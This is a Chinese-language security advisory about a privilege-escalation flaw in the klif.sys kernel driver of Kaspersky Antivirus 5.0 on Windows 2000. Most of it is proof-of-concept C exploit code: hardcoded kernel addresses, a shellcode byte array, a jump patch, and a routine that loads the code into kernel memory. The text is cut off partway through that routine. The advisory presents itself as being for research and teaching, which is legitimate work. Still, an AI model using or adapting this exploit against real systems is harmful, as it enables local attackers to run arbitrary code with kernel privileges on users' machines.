受影响系统:
Kaspersky Labs Kaspersky Antivirus 5.0.335
Kaspersky Labs Kaspersky Antivirus 5.0.228
Kaspersky Labs Kaspersky Antivirus 5.0.227
描述:
------------------------------------------
BUGTRAQ ID: _blank>13878
Kaspersky是一款非常流行的杀毒软件。
Microsoft Windows 2000平台的Kaspersky软件设计上存在漏洞,本地攻击者可能利用此漏洞提升自己的权限。
起因是Kaspersky内核驱动klif.sys没有正确丢弃高权限,攻击者可能利用这个漏洞以系统内核的权限执行任意代码。
<*来源:Ilya Rabinovich (info@softsphere.com)
链接:_blank>
http://marc.theaimsgroup.com/?l=bugtraq&;m=111817777430401&w=2
*>
测试方法:
------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
//(C) by Ilya Rabinovich.
#include <windows.h>
PUCHAR pCodeBase=(PUCHAR)0xBE9372C0;
PDWORD pJmpAddress=(PDWORD)0xBE9372B0;
PUCHAR pKAVRets[]={(PUCHAR)0xBE935087,(PUCHAR)0xBE935046};
PUCHAR pKAVRet;
unsigned char code[]={0x68,0x00,0x02,0x00,0x00, //push 0x200
0x68,0x00,0x80,0x93,0xBE, //push <buffer address> - 0xBE938000
0x6A,0x00, //push 0
0xB8,0x00,0x00,0x00,0x00, //mov eax,<GetModuleFileNameA> -> +13
0xFF,0xD0, //call eax
0x68,0x00,0x80,0x93,0xBE, //push <buffer address>
0x68,0x00,0x82,0x93,0xBE, //push <address of the notepad path>- 0xBE938200
0xB8,0x00,0x00,0x00,0x00, //mov eax,<lstrcmpiA> -> +30
0xFF,0xD0, //call eax
0x85,0xC0, //test eax,eax
0x74,0x03, //je +03
0xC2,0x04,0x00, //retn 4
0x6A,0x00, //push 0
0x68,0x00,0x84,0x93,0xBE, //push <address of the message string>- 0xBE938400
0x68,0x00,0x84,0x93,0xBE, //push <address of the message string>- 0xBE938400
0x6A,0x00, //push 0
0xB8,0x00,0x00,0x00,0x00, //mov eax,<MessageBoxA> -> +58
0xFF,0xD0, //call eax
0xC2,0x04,0x00 //retn 4
};
unsigned char jmp_code[]={0xFF,0x25,0xB0,0x72,0x93,0xBE}; //jmp dword prt \
[0xBE9372B0]
//////////////////////////////////////////////////////////////
BOOLEAN LoadExploitIntoKernelMemory(void){
//Get function's addresses
HANDLE hKernel=GetModuleHandle("KERNEL32.DLL");
HANDLE hUser=GetModuleHandle("USER32.DLL");
FARPROC pGetModuleFileNameA=GetProcAddress(hKernel,"GetModuleFileNameA");
FARPROC plstrcmpiA=GetProcAddress(hKernel,"lstrcmpiA");
FARPROC pMessageBoxA=GetProcAddress(hUser,"MessageBoxA");
*(DWORD*)(code+13)=(DWORD)pGetModuleFileNameA;
*(DWORD*)(code+30)=(DWORD)plstrcmpiA;
*(DWORD*)(code+58)=(DWORD)pMessageBoxA;